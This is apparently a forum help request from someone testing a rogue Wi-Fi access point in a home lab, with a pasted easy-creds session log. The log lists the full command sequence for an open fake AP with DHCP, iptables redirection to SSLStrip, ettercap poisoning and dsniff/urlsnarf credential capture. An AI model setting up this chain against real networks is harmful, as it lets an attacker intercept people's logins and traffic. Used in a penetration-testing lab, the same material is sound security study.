Today, I set up a fakeap home, But it confuses me.
When a mobile connect to the fakeap, it says "Network connection error. Try again ?" or "authentication error ".
What's the reason ?
[Lab]
Windows 7 + VirtualBox(Backtrack r3 x 86)
What I have done , E.x:
======================================================================================
easy-creds v3.6 11/08/2011
This script leverages tools for stealing credentials during a pen test.
*** At any time, ctrl+c to return to main menu ***
[+] Provide path for saving log files, ex. root, *NOT* /root/: /root/Desktop/
[+] Would you like to include a sidejacking attack? (y/n): n
[+] Network Interfaces:
eth0 xx:xx:xx:xx:xx:xx IP:10.0.2.15
[+] Interface connected to the internet, example eth0: eth0
[*] airmon-ng
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
[+] Wireless interface name, example wlan0: wlan0
[+] rogue AP ESSID, example FreeWiFi: Freeeeeeeee
[+] Channel, example 6 or 11: 6
[+] Monitor interface(s)
[*] airmon-ng | grep mon
mon0 Ralink RT2870/3070 rt2800usb - [phy0]
[+] Enter monitor enabled interface name, example mon0: mon0
[*] ifconfig | grep Link| grep -v lo
eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
inet6 addr: xxxx::xxx:xxxx:xxxx:xxx/xx Scope:Link
mon0 Link encap:UNSPEC HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00
[+] Enter tunnel interface, example at0: at0
[+] Do you have a populated dhcpd.conf file to use? (y/n) n
[+]Create dhcpd conf file: /etc/dhcp3/dhcpd-ec.conf
[+]Network range for your tunneled interface, example 10.0.0.0/24: 192.168.1.0/24
[+] Enter the IP address for the DNS server, example 8.8.8.8: 8.8.8.8
Creating a dhcpd.conf to assign addresses to clients that connect to us.
------/etc/dhcp3/dhcpd-ec.conf-----------
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.200;
option domain-name-servers 8.8.8.8;
option routers 192.168.1.1;
option broadcast-address 192.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}
[+] Launching Airbase with your settings.
[*] airbase-ng -P -e Freeeeeeeee -c 6 mon0 &
[+] Configuring dhcp tunneled interface.
[?] TUNIFACE: at0
[?] ATIP: 192.168.1.1
[?] ATSUB: 255.255.255.0
[?] ATNET: 192.168.1.0
[*] ifconfig at0 up
[*] ifconfig at0 192.168.1.1 netmask 255.255.255.0
[*] ifconfig at0 mtu 1400
[*] route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 dev at0
[+] Setting up iptables to handle traffic seen by the tunneled interface.
[*] iptables --flush
[*] iptables --table nat --flush
[*] iptables --delete-chain
[*] iptables --table nat --delete-chain
[*] iptables -P FORWARD ACCEPT
[*] iptables --append FORWARD --in-interface at0 -j ACCEPT
[*] iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
[*] iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
[+] Launching Tail.
[*] tail -f /var/log/messages &
[+] DHCP server starting on tunneled interface.
[*] dhcpd3 -q -cf /etc/dhcp3/dhcpd-ec.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
[*] ifconfig | grep Link| grep -v lo
at0 Link encap:Ethernet HWaddr 7c:dd:90:42:94:55
inet6 addr: fe80::7edd:90ff:fe42:9455/64 Scope:Link
eth0 Link encap:Ethernet HWaddr 08:00:27:c9:07:55
inet6 addr: fe80::a00:27ff:fec9:755/64 Scope:Link
mon0 Link encap:UNSPEC HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00
[+] Creating folder for attack output ...
[*] mkdir -p //root/Desktop//easy-creds-2014-01-05-0924
[+] Launching SSLStrip.
[*] python /pentest/web/sslstrip/sslstrip.py -pfk -w //root/Desktop//easy-creds-2014-01-05-0924/sslstrip2014-01-05-0925.log &
[+] Launching ettercap, poisoning specified hosts.
[*] ettercap -a /etc/etter.conf -T -q -l //root/Desktop//easy-creds-2014-01-05-0924/ettercap2014-01-05-0925 -i at0 // // &
[+] Configuring IP forwarding.
[*] echo 1 > /proc/sys/net/ipv4/ip_forward
[+] Launching URLSnarf.
[*] urlsnarf -i at0&
Launching Dsniff.
[*] dsniff -m -i at0 -w //root/Desktop//easy-creds-2014-01-05-0924/dsniff2014-01-05-0925.log &
[^] Time to make it rain... Enjoy!